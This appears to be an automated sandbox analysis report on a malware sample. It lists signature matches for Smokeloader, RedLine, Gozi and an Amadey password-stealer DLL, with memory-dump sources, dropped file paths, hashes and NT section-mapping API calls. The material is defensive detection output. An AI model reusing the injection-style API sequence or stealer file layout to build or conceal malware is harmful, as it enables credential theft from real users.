Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED	Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED	Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040E054
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040AD62
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040F105
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040DB10
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040E054
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040AD62
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040F105
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040DB10
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00B4130D
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00407D62
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00418244
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00401650
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00418788
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_02526078
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_02526088

Source: C:\Windows\explorer.exe

Section loaded: webio.dll

Source: S2XJ2wbz7u.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED	Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED	Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: String function: 0040E1D8 appears 44 times

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
